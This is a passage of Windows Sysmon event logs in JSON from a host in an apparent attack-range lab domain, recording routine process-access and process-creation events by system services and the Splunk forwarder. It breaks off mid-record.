{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010FBFD0300}\r\nTargetProcessId: 3988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010FBFD0300}","TargetProcessId":"3988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.909\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-0010CEFF0300}\r\nProcessId: 3764\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.909","ProcessGuid":"{A837DB8D-01CA-5F25-0000-0010CEFF0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010CEFF0300}\r\nTargetProcessId: 3764\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010CEFF0300}","TargetProcessId":"3764","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010CEFF0300}\r\nTargetProcessId: 3764\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010CEFF0300}","TargetProcessId":"3764","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 